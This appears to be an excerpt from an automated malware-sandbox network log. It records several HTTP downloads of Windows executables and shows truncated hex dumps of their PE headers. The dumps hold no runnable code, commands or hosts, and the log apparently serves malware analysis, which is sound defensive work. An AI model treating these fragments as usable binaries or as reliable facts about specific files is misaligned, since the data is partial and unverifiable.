Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:24:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
